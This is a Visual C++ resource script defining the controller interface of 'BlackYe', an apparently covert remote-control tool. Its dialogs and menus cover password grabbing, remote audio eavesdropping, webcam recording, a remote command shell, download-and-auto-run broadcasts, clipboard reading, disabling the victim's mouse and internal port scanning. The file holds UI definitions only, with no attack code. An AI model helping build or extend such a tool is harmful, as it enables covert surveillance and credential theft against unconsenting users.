// Microsoft Visual C++ generated resource script.
//
#include "resource.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#ifndef APSTUDIO_INVOKED
#include "targetver.h"
#endif
#include "afxres.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS

/////////////////////////////////////////////////////////////////////////////
// 中文(中华人民共和国) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
#ifdef _WIN32
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
#pragma code_page(936)
#endif //_WIN32

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE 
BEGIN
    "resource.h\0"
END

2 TEXTINCLUDE 
BEGIN
    "#ifndef APSTUDIO_INVOKED\r\n"
    "#include ""targetver.h""\r\n"
    "#endif\r\n"
    "#include ""afxres.h""\r\n"
    "\0"
END

3 TEXTINCLUDE 
BEGIN
    "#define _AFX_NO_SPLITTER_RESOURCES\r\n"
    "#define _AFX_NO_OLE_RESOURCES\r\n"
    "#define _AFX_NO_TRACKER_RESOURCES\r\n"
    "#define _AFX_NO_PROPERTY_RESOURCES\r\n"
    "\r\n"
    "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)\r\n"
    "LANGUAGE 4, 2\r\n"
    "#pragma code_page(936)\r\n"
    "#include ""res\\Client.rc2""  // 非 Microsoft Visual C++ 编辑的资源\r\n"
    "#include ""l.CHS\\afxres.rc""      // 标准组件\r\n"
    "#endif\r\n"
    "\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Icon
//

// Icon with lowest ID value placed first to ensure application icon
// remains consistent on all systems.
IDR_MAINFRAME           ICON                    "res\\Client.ico"
IDI_ICON_DISK           ICON                    "res\\disk.ico"
IDI_ICON_FILE           ICON                    "res\\file.ico"
IDI_ICON_FOLDER         ICON                    "res\\folder.ico"
IDI_ICON_COMPUTER       ICON                    "res\\MyComputer.ico"
IDI_ICON_REMOVE         ICON                    "res\\RemoveDisk.ico"
IDI_ICON_FOLDERLIST     ICON                    "res\\folder_List.ico"
IDI_ICON_CMD            ICON                    "res\\CmdShell.ico"
IDI_ICON_FILEVIEW       ICON                    "res\\Menu\\FileExplorerView.ico"
IDI_ICON_FILETRANS      ICON                    "res\\Menu\\FileTrans.ico"
IDI_ICON_SYSPROG        ICON                    "res\\Menu\\SysProgress.ico"
IDI_ICON_SYSSERVER      ICON                    "res\\Menu\\SysServer.ico"
IDI_ICON_FILE_MANAGER   ICON                    "res\\Menu\\Frame.ico"
IDI_ICON_SYS_MANAGER    ICON                    "res\\Menu\\SysConTrol.ico"
IDI_ICON_CHATMSG        ICON                    "res\\Menu\\ChatMsg.ICO"
IDI_ICON_READPSW        ICON                    "res\\Menu\\Admin.ICO"
IDI_ICON_AUDIO          ICON                    "res\\Menu\\audio.ico"
IDI_ICON_REMOTE         ICON                    "res\\Menu\\BroadCast.ico"
IDI_ICON_CAMERA         ICON                    "res\\Menu\\camer.ico"
IDI_ICON_IE             ICON                    "res\\Menu\\IE.ico"
IDI_ICON_WINDOWS        ICON                    "res\\Menu\\Windows.ico"
IDI_ICON_DESKTOP        ICON                    "res\\Menu\\desktop.ico"
IDI_ICON_CAMER          ICON                    "res\\camer.ico"
IDI_ICON_NOCAMER        ICON                    "res\\TencentQQView.ico"

/////////////////////////////////////////////////////////////////////////////
//
// Dialog
//

IDD_DLG_CLIENT DIALOGEX 0, 0, 358, 201
STYLE DS_SETFONT | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
EXSTYLE WS_EX_APPWINDOW
CAPTION "BlackYe.远程控制软件"
MENU IDR_MENU
FONT 9, "MS Shell Dlg", 0, 0, 0x1
BEGIN
    CONTROL         "",IDC_LIST_SERVER,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,0,35,357,156
END

IDD_DLG_FILE DIALOGEX 0, 0, 399, 261
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "磁盘管理"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_TAB_FILE,"SysTabControl32",0x0,0,0,399,249
END

IDD_DLG_FILEVIEW DIALOGEX 0, 0, 400, 239
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD | WS_BORDER | WS_SYSMENU
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    LTEXT           "当前路径：",IDC_CUR_FILEPATH,6,6,43,9
    EDITTEXT        IDC_EDIT_CURPATH,54,3,295,15,ES_AUTOHSCROLL | ES_READONLY
    CONTROL         "",IDC_TREE_FILE,"SysTreeView32",TVS_HASBUTTONS | TVS_HASLINES | TVS_LINESATROOT | WS_BORDER | WS_HSCROLL | WS_TABSTOP,0,21,139,217
    CONTROL         "",IDC_LIST_FILE,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,138,21,261,217
    CONTROL         "",IDC_STATIC,"Static",SS_ETCHEDFRAME,1,21,395,1
END

IDD_DLG_FILETRANS DIALOGEX 0, 0, 403, 238
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD | WS_BORDER | WS_SYSMENU
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_FILE_PROCESS,"msctls_progress32",WS_BORDER,74,6,236,17
    CONTROL         "",IDC_LIST_DOWNLOAD,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,1,28,402,209
    LTEXT           "文件传输进度：",IDC_STATIC,7,9,56,15
    PUSHBUTTON      "取消传输",IDC_BTN_TRANS_CANCLE,323,6,70,18
END

IDD_DLG_DIRLOCATION DIALOGEX 0, 0, 316, 74
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "选择目录"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    EDITTEXT        IDC_EDIT_FILE_PATH,26,21,209,18,ES_AUTOHSCROLL | ES_READONLY
    PUSHBUTTON      "浏览",IDC_BTN_BROWSER,243,21,52,18
    GROUPBOX        "文件下载路径",IDC_STATIC,7,3,302,64
    PUSHBUTTON      "确定",IDOK,142,46,52,18
    PUSHBUTTON      "取消",IDCANCEL,206,46,52,18
END

IDD_DLG_FOLDER DIALOGEX 0, 0, 185, 59
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "创建目录"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    DEFPUSHBUTTON   "确定",IDOK,40,41,50,14
    PUSHBUTTON      "取消",IDCANCEL,101,41,50,14
    LTEXT           "名称:",IDC_STATIC,5,5,35,10
    EDITTEXT        IDC_EDIT_FOLDER,2,19,179,15,ES_AUTOHSCROLL
END

IDD_DLG_RENAME DIALOGEX 0, 0, 185, 60
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "文件名称"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    DEFPUSHBUTTON   "确定",IDOK,36,43,50,14
    PUSHBUTTON      "取消",IDCANCEL,99,43,50,14
    LTEXT           "名称",IDC_STATIC,6,6,25,10
    EDITTEXT        IDC_EDIT_FILE_RENAME,3,20,180,15,ES_AUTOHSCROLL
END

IDD_DLG_ATTRIBUTE DIALOGEX 0, 0, 248, 223
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Dialog"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    DEFPUSHBUTTON   "退出",IDOK,157,203,65,17
    GROUPBOX        "属性",IDC_STATIC,9,4,228,196
    ICON            "",IDC_PIC_ATTR,28,22,20,20
    EDITTEXT        IDC_ATTR_FILE_NAME,79,26,145,17,ES_AUTOHSCROLL | ES_READONLY
    CONTROL         "",IDC_STATIC,"Static",SS_ETCHEDFRAME,17,55,216,1
    LTEXT           "类型:",IDC_STATIC,22,63,30,11
    LTEXT           "位置:",IDC_STATIC,22,84,30,12
    CONTROL         "",IDC_STATIC,"Static",SS_ETCHEDFRAME,16,104,216,1
    LTEXT           "创建时间:",IDC_STATIC,22,113,38,11
    LTEXT           "修改时间:",IDC_STATIC,22,133,38,11
    LTEXT           "访问时间:",IDC_STATIC,22,152,39,10
    CONTROL         "",IDC_STATIC,"Static",SS_ETCHEDFRAME,17,170,213,1
    LTEXT           "属性:",IDC_STATIC,22,179,27,12
    CONTROL         "只读",IDC_CHECK_READONLY,"Button",BS_AUTOCHECKBOX | WS_DISABLED | WS_TABSTOP,58,177,29,14
    CONTROL         "隐藏",IDC_CHECK_HIDE,"Button",BS_AUTOCHECKBOX | WS_DISABLED | WS_TABSTOP,101,177,29,15
    LTEXT           "静态",IDC_STATIC_TYPE,62,63,105,14
    LTEXT           "静态",IDC_STATIC_LOACTION,61,84,163,14
    LTEXT           "静态",IDC_STATIC_CREATE_TIME,64,113,115,14
    LTEXT           "静态",IDC_STATIC_MODI_TIME,64,133,115,14
    LTEXT           "静态",IDC_STATIC_VISIT_TIME,64,152,115,14
    CONTROL         "存档",IDC_CHECK_ARCHIVE,"Button",BS_AUTOCHECKBOX | WS_DISABLED | WS_TABSTOP,143,177,29,14
    CONTROL         "系统",IDC_CHECK_SYSTEM,"Button",BS_AUTOCHECKBOX | WS_DISABLED | WS_TABSTOP,185,177,29,14
END

IDD_DLG_TELNET DIALOGEX 0, 0, 339, 206
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Dialog"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    EDITTEXT        IDC_EDIT_CMD_RECV,0,0,339,172,ES_MULTILINE | ES_AUTOHSCROLL | WS_VSCROLL | NOT WS_TABSTOP
    EDITTEXT        IDC_EDIT_CMD_SEND,28,177,259,13,ES_AUTOHSCROLL
    LTEXT           "CMD:",IDC_STATIC,3,178,20,10
    PUSHBUTTON      "执行",IDC_BTN_CMD_SEND,292,177,44,16
END

IDD_DLG_SYSTEM DIALOGEX 0, 0, 378, 274
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "系统管理"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_TAB_SYSTEM,"SysTabControl32",0x0,0,0,378,262
END

IDD_DLG_PROGRESS DIALOGEX 0, 0, 378, 249
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD | WS_BORDER | WS_SYSMENU
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    CONTROL         "",IDC_LIST_PROGRESS,"SysListView32",LVS_REPORT | LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,0,0,378,249
END

IDD_DLG_SERVER DIALOGEX 0, 0, 376, 237
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD | WS_BORDER | WS_SYSMENU
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
END

IDD_DLG_CHAT DIALOGEX 0, 0, 305, 214
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "信使服务"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    PUSHBUTTON      "关闭(Q)",IDCANCEL,232,190,50,19
    PUSHBUTTON      "发送(Enter)",IDC_BTN_SEND_MSG,174,190,47,19
    EDITTEXT        IDC_EDIT_CHAT_RECV,0,0,305,142,ES_MULTILINE | WS_VSCROLL
    EDITTEXT        IDC_EDIT_CHAT_SEND,1,146,304,40,ES_MULTILINE | ES_WANTRETURN | WS_VSCROLL
    LTEXT           "注: [发送]按钮的快捷键是Ctrl+Enter",IDC_STATIC_CHAT_TIPS,8,196,131,14
END

IDD_DLG_READPSW DIALOGEX 0, 0, 374, 249
STYLE DS_SETFONT | DS_FIXEDSYS | WS_CHILD | WS_SYSMENU
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    EDITTEXT        IDC_EDIT_READ_PSW,1,1,372,222,ES_MULTILINE | ES_WANTRETURN | WS_VSCROLL
    PUSHBUTTON      "一键获取",IDC_BTN_GETPSW,277,226,64,20,WS_DISABLED
    LTEXT           "注: 如果用户修改了帐号和密码，则需要重启才能正确获取",IDC_STATIC_READPSW,15,231,216,14
END

IDD_DLG_SCREEN DIALOGEX 0, 0, 494, 402
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_VSCROLL | WS_HSCROLL | WS_SYSMENU
CAPTION "Dialog"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
END

IDD_DLG_VIDEO DIALOGEX 0, 0, 266, 204
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Dialog"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    PUSHBUTTON      "开始录像",IDC_BTN_RECORDS,140,174,54,16
    PUSHBUTTON      "■停止录像",IDC_BTN_RECORDE,202,174,54,16
END

IDD_DLG_AUDIO DIALOGEX 0, 0, 213, 65
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "语言监听"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    GROUPBOX        "",IDC_STATIC,6,1,201,59
    LTEXT           "正在监听远程声音 ......",IDC_STATIC,15,14,96,9
    LTEXT           "Microsoft GSM 6.10 Audio CODEC",IDC_STATIC,15,26,108,11
    LTEXT           "Receive 0 KBytes",IDC_TIPS,128,26,78,8
    CONTROL         "发送本地语音到远程",IDC_SEND_LOCALAUDIO,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,15,39,103,13
END

IDD_DLG_BROADCAST DIALOGEX 0, 0, 316, 207
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "远程命令广播"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    LTEXT           "打开网页 :",IDC_STATIC,21,22,39,11
    EDITTEXT        IDC_EDIT_OPEN_WEB,69,20,154,16,ES_AUTOHSCROLL
    PUSHBUTTON      "发送",IDC_BTN_OPEN_WEBSITE,231,20,48,17
    LTEXT           "下载文件 :",IDC_STATIC,21,43,39,11
    EDITTEXT        IDC_EDIT_DOWN_WEB,69,41,154,17,ES_AUTOHSCROLL
    PUSHBUTTON      "发送",IDC_BTN_DOWN_WEBSITE,231,42,48,17
    GROUPBOX        "常用命令广播",IDC_STATIC,9,7,295,74
    CONTROL         "文件下载完成后自动运行",IDC_CHECK_RUN_FILE,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,23,63,101,12
    LTEXT           "图标类型 :",IDC_STATIC,19,102,40,13
    COMBOBOX        IDC_COMBO_ICON,64,101,80,14,CBS_DROPDOWN | CBS_SORT | WS_VSCROLL | WS_TABSTOP
    LTEXT           "按钮类型 :",IDC_STATIC,158,102,37,11
    COMBOBOX        IDC_COMBO_BUTTON,209,101,80,14,CBS_DROPDOWN | CBS_SORT | WS_VSCROLL | WS_TABSTOP
    LTEXT           "消息标题 :",IDC_STATIC,19,123,41,13
    EDITTEXT        IDC_EDIT_MSG_TITLE,64,121,226,16,ES_AUTOHSCROLL
    LTEXT           "消息正文 :",IDC_STATIC,19,145,40,14
    EDITTEXT        IDC_EDIT_MSG_CONTENT,63,142,227,17,ES_AUTOHSCROLL
    PUSHBUTTON      "发送",IDC_BTN_SEND_WND,196,165,39,26,BS_FLAT
    PUSHBUTTON      "预览",IDC_BTN_PREVIEW_WND,246,164,39,26,BS_FLAT
    GROUPBOX        "弹窗命令广播",IDC_STATIC,11,85,294,110
    LTEXT           "（注：下载文件路径必须包含http头）",IDC_STATIC_BROADTIP,142,65,133,11
    ICON            IDI_ICON_IE,IDC_STATIC,31,167,20,20
    ICON            IDI_ICON_WINDOWS,IDC_STATIC,74,167,21,20
END

IDD_DLG_DESKTOP DIALOGEX 0, 0, 407, 158
STYLE DS_SETFONT | DS_MODALFRAME | DS_FIXEDSYS | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "桌面管理"
FONT 8, "MS Shell Dlg", 400, 0, 0x1
BEGIN
    PUSHBUTTON      "禁止鼠标移动",IDC_BTN_HIDE_MOUSE,11,7,86,21,BS_FLAT
    PUSHBUTTON      "允许鼠标移动",IDC_BTN_ALLOW_MOUSE,11,32,86,21,BS_FLAT
    PUSHBUTTON      "隐藏桌面图标",IDC_BTN_HIDE_DESKTOP,11,57,86,21,BS_FLAT
    PUSHBUTTON      "显示桌面图标",IDC_BTN_SHOW_DESKTOP,11,82,86,21,BS_FLAT
    PUSHBUTTON      "隐藏任务栏",IDC_BTN_HIDE_TASKBAR,11,107,86,21,BS_FLAT
    GROUPBOX        "",IDC_STATIC,1,0,106,157
    EDITTEXT        IDC_EDIT_CLIPBOARD,115,8,289,123,ES_MULTILINE | ES_WANTRETURN | WS_VSCROLL
    GROUPBOX        "",IDC_STATIC,111,0,296,158
    PUSHBUTTON      "显示任务栏",IDC_BTN_SHOW_TASKBAR,11,132,86,21,BS_FLAT
    PUSHBUTTON      "查看剪切板字符串",IDC_BTN_VIEW_CLIP,115,133,141,21,BS_FLAT
    PUSHBUTTON      "保存剪切板字符串",IDC_BTN_SAVE_CLIP,261,133,143,21,BS_FLAT
END


/////////////////////////////////////////////////////////////////////////////
//
// Version
//

VS_VERSION_INFO VERSIONINFO
 FILEVERSION 1,0,0,1
 PRODUCTVERSION 1,0,0,1
 FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
 FILEFLAGS 0x1L
#else
 FILEFLAGS 0x0L
#endif
 FILEOS 0x4L
 FILETYPE 0x1L
 FILESUBTYPE 0x0L
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "080403a8"
        BEGIN
            VALUE "CompanyName", "TODO: <公司名>"
            VALUE "FileDescription", "TODO: <文件说明>"
            VALUE "FileVersion", "1.0.0.1"
            VALUE "InternalName", "Client.exe"
            VALUE "LegalCopyright", "TODO: (C) <公司名>。保留所有权利。"
            VALUE "OriginalFilename", "Client.exe"
            VALUE "ProductName", "TODO: <产品名>"
            VALUE "ProductVersion", "1.0.0.1"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation", 0x804, 936
    END
END


/////////////////////////////////////////////////////////////////////////////
//
// Menu
//

IDR_MENU MENU 
BEGIN
    POPUP "文件"
    BEGIN
        MENUITEM "退出",                          ID_32771
    END
    POPUP "选项"
    BEGIN
        MENUITEM "配置",                          ID_32772
    END
    POPUP "帮助"
    BEGIN
        MENUITEM "关于软件",                        ID_32773
    END
END

IDR_MENU_FILE MENU 
BEGIN
    POPUP "文件"
    BEGIN
        MENUITEM "远程执行",                        ID_FILE_RUN
        MENUITEM SEPARATOR
        MENUITEM "刷新",                          ID_FILE_FLUSH
        MENUITEM SEPARATOR
        MENUITEM "复制",                          ID_FILE_COPY
        MENUITEM "粘贴",                          ID_FILE_PASTE
        MENUITEM "删除",                          ID_FILE_DEL
        MENUITEM SEPARATOR
        MENUITEM "文件上传",                        ID_FILE_UPLOAD
        MENUITEM "文件下载",                        ID_FILE_DOWNLOAD
        MENUITEM "创建目录",                        ID_FILE_CREATE
        MENUITEM SEPARATOR
        MENUITEM "重命名",                         ID_FILE_RENAME
        MENUITEM SEPARATOR
        MENUITEM "属性",                          ID_FILE_ATTRIBUTE
    END
END

IDR_MENU_HOST MENU 
BEGIN
    POPUP "主机"
    BEGIN
        MENUITEM "信使服务",                        ID_MENU_MSG
        MENUITEM SEPARATOR
        MENUITEM "关机",                          ID_MENU_SHUTDOWN
        MENUITEM "重启",                          ID_MENU_RESET
        MENUITEM "注销",                          ID_MENU_LOGOFF
        MENUITEM SEPARATOR
        MENUITEM "语音监听",                        ID_MENU_VOICE
        MENUITEM "远程命令广播",                      ID_MENU_REMOTE_CMD
        MENUITEM "桌面管理",                        ID_MENU_DESKTOP
        MENUITEM SEPARATOR
        MENUITEM "内网端口扫描",                      ID_MENU_SCANPORT
    END
END

IDR_MENU_PROCESS MENU 
BEGIN
    POPUP "进程"
    BEGIN
        MENUITEM "关闭进程",                        ID_PROC_TASKKILL
        MENUITEM "刷新进程列表",                      ID_PROC_REFRESH
    END
END

IDR_MENU_TRAY MENU 
BEGIN
    POPUP "托盘"
    BEGIN
        MENUITEM "隐藏",                          ID_MENU_TRAY_HIDE
        MENUITEM "显示",                          ID_MENU_TRAY_SHOW
        MENUITEM "退出",                          ID_MENU_TRAY_EXIT
    END
END


/////////////////////////////////////////////////////////////////////////////
//
// Bitmap
//

IDB_BMP_ABOUT           BITMAP                  "res\\About.bmp"
IDB_BMP_CAMERA          BITMAP                  "res\\camera.bmp"
IDB_BMP_CMD             BITMAP                  "res\\Cmd.bmp"
IDB_BMP_FILE            BITMAP                  "res\\File_Manager.bmp"
IDB_BMP_PROCESS         BITMAP                  "res\\Process.bmp"
IDB_BMP_RECYCLE         BITMAP                  "res\\recycle.bmp"
IDB_BMP_SCREEN          BITMAP                  "res\\Screen.bmp"
IDB_BMP_SETTING         BITMAP                  "res\\Setting.bmp"
IDB_BMP_NOTICE          BITMAP                  "res\\Msg_Notice.bmp"
IDB_BMP_DOWNLOAD        BITMAP                  "G:\\项目源代码\\远程控制软件\\RemoteControl_BlackYe_05\\Client\\res\\Menu\\submenu3\\download.bmp"
IDB_BMP_UPLOAD          BITMAP                  "G:\\项目源代码\\远程控制软件\\RemoteControl_BlackYe_05\\Client\\res\\Menu\\submenu3\\Upload.bmp"
IDB_BMP_DEL             BITMAP                  "res\\Menu\\submenu3\\delete.bmp"
IDB_BMP_CREATE          BITMAP                  "res\\Menu\\submenu3\\new_folder.bmp"
IDB_BMP_REFRESH         BITMAP                  "res\\Menu\\submenu3\\refresh.bmp"
IDB_BMP_RUN             BITMAP                  "res\\Menu\\submenu3\\run1.bmp"
IDB_BMP_COPY            BITMAP                  "res\\Menu\\submenu3\\Copy.bmp"
IDB_BMP_PASTE           BITMAP                  "res\\Menu\\submenu3\\paste.bmp"
IDB_BMP_TASKKILL        BITMAP                  "res\\Menu\\submenu2\\taskkill.bmp"
IDB_BMP_INTERNET        BITMAP                  "res\\Menu\\submenu1\\http.bmp"
IDB_BMP_RESTART         BITMAP                  "res\\Menu\\submenu1\\restart.bmp"
IDB_BMP_SHUTDOWN        BITMAP                  "res\\Menu\\submenu1\\shutdown.bmp"
IDB_BMP_UPDATE          BITMAP                  "res\\Menu\\submenu1\\update.bmp"
IDB_BMP_AUDIO           BITMAP                  "res\\Menu\\submenu1\\audio.bmp"
IDB_BMP_DESKTOP         BITMAP                  "res\\Menu\\submenu1\\desktop.bmp"
IDB_BMP_MAIL            BITMAP                  "res\\Menu\\submenu1\\mail.bmp"
IDB_BMP_REMOTE          BITMAP                  "res\\Menu\\submenu1\\Remote.bmp"
IDB_BMP_LOGOFF          BITMAP                  "res\\Menu\\submenu1\\logoff.bmp"
IDB_BMP_EXIT            BITMAP                  "res\\Menu\\exit.bmp"
IDB_BMP_HIDE            BITMAP                  "res\\Menu\\submenu1\\agent.bmp"
IDB_BMP_SHOW            BITMAP                  "res\\Menu\\submenu1\\show.bmp"

/////////////////////////////////////////////////////////////////////////////
//
// DESIGNINFO
//

#ifdef APSTUDIO_INVOKED
GUIDELINES DESIGNINFO 
BEGIN
    IDD_DLG_FILE, DIALOG
    BEGIN
        BOTTOMMARGIN, 260
    END

    IDD_DLG_DIRLOCATION, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 309
        TOPMARGIN, 7
        BOTTOMMARGIN, 67
    END

    IDD_DLG_PROGRESS, DIALOG
    BEGIN
        RIGHTMARGIN, 377
    END

    IDD_DLG_SERVER, DIALOG
    BEGIN
        BOTTOMMARGIN, 236
    END
END
#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// String Table
//

STRINGTABLE 
BEGIN
    IDP_SOCKETS_INIT_FAILED "Windows 套接字初始化失败。"
END

#endif    // 中文(中华人民共和国) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//
#define _AFX_NO_SPLITTER_RESOURCES
#define _AFX_NO_OLE_RESOURCES
#define _AFX_NO_TRACKER_RESOURCES
#define _AFX_NO_PROPERTY_RESOURCES

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
LANGUAGE 4, 2
#pragma code_page(936)
#include "res\Client.rc2"  // 非 Microsoft Visual C++ 编辑的资源
#include "l.CHS\afxres.rc"      // 标准组件
#endif

/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED

